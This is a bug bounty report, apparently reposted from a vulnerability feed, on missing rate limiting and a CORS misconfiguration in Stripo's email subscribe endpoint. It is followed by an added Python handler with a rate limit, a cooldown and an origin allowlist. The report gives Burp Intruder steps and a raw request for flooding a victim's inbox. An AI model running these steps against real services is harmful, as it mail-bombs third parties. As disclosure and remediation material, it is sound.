Stripo Inc: No rate limiting for subscribe email + leads to Cross origin misconfiguration
News category: Security vulnerabilities
Source: vulners.com

Summary: I found a rate-limiting bypass using the Access-Control-Allow-Origin header; the response comes back as 200, which shows it is vulnerable. No rate limit means there is no mechanism to protect against requests made in a short frame of time. If the repetition does not produce any error after 50, 100, or 1000 repetitions, then no rate limit is set. Similar vulnerabilities have been registered in #297359, #774050, and #922470.

Affected URL: https://stripo.email/subscribe/

Step-by-step Reproduction Instructions:

1. Go to https://stripo.email/, scroll down, and look for the subscribe button.
2. Add the victim's email and capture the request in Burp Suite.
3. Send the request to Burp Intruder and clear all payload markers (§).
4. In Payloads, set null payloads and run Intruder.
5. Boom: 1 million requests sent to the victim's email.

Request

```
POST /subscribe/ HTTP/1.1
Host: stripo.email
X-Requested-With: XMLHttpRequest
Content-Length: 126
Origin: https://evil.stripo.email
Connection: close
Referer: https://evil.stripo.email/

_token=§§&source=LANDING&subscribe-email=hostbugbounty%40gmail.com&g-recaptcha-response=
```

**Response (vulnerable)**

```
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 Nov 2020 04:33:08 GMT
Content-Type: application/json
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: private, must-revalidate
pragma: no-cache
expires: -1
X-RateLimit-Limit: 20
X-RateLimit-Remaining: 14
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
X-Frame-Options: SAMEORIGIN
Access-Control-Allow-Origin: ...
...
```
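The two weaknesses the report describes, an unthrottled subscribe endpoint and an `Access-Control-Allow-Origin` value granted to an attacker-chosen `evil.stripo.email` origin, are closed on the server side by a per-client sliding-window limit, a per-address cooldown on confirmation mail, and an exact-match origin allowlist. The handler below is an added illustration, not Stripo's code; the window length, cooldown and allowlist are assumptions, and the limit of 20 is the `X-RateLimit-Limit` value shown in the response above.

```python
from collections import defaultdict, deque
import math

RATE_LIMIT = 20        # requests per client per window (the X-RateLimit-Limit seen in the report)
WINDOW_SECONDS = 60    # assumed window length
EMAIL_COOLDOWN = 3600  # assumed: at most one confirmation mail per address per hour
# Assumed exact-match allowlist; a suffix check such as endswith("stripo.email")
# would also accept an attacker-controlled evil.stripo.email origin.
ALLOWED_ORIGINS = {"https://stripo.email", "https://www.stripo.email"}

_requests = defaultdict(deque)  # client_ip -> timestamps of recent requests
_last_mail = {}                 # email -> time the last confirmation mail was sent


def reset_state():
    """Clear the in-memory counters (handy for tests)."""
    _requests.clear()
    _last_mail.clear()


def cors_headers(origin):
    """Emit Access-Control-Allow-Origin only for an allowlisted origin, never reflected."""
    if origin in ALLOWED_ORIGINS:
        return {"Access-Control-Allow-Origin": origin, "Vary": "Origin"}
    return {}


def handle_subscribe(client_ip, origin, email, now):
    """Process one POST /subscribe. Returns (status, headers, mail_sent).
    The per-IP sliding window answers the null-payload flood with 429 after
    RATE_LIMIT requests; the per-address cooldown keeps a victim mailbox from
    being bombed even if the attacker rotates source IPs."""
    window = _requests[client_ip]
    while window and window[0] <= now - WINDOW_SECONDS:
        window.popleft()  # forget requests that left the window
    headers = cors_headers(origin)
    headers["X-RateLimit-Limit"] = str(RATE_LIMIT)
    if len(window) >= RATE_LIMIT:
        headers["X-RateLimit-Remaining"] = "0"
        headers["Retry-After"] = str(max(1, math.ceil(window[0] + WINDOW_SECONDS - now)))
        return 429, headers, False
    window.append(now)
    headers["X-RateLimit-Remaining"] = str(RATE_LIMIT - len(window))
    last = _last_mail.get(email)
    if last is not None and now - last < EMAIL_COOLDOWN:
        return 200, headers, False  # same response shape, but no extra e-mail
    _last_mail[email] = now
    return 200, headers, True  # the caller sends the confirmation e-mail here
```

The counters are in-process for clarity; a real deployment keeps them in a shared store so that the limit holds across all application instances.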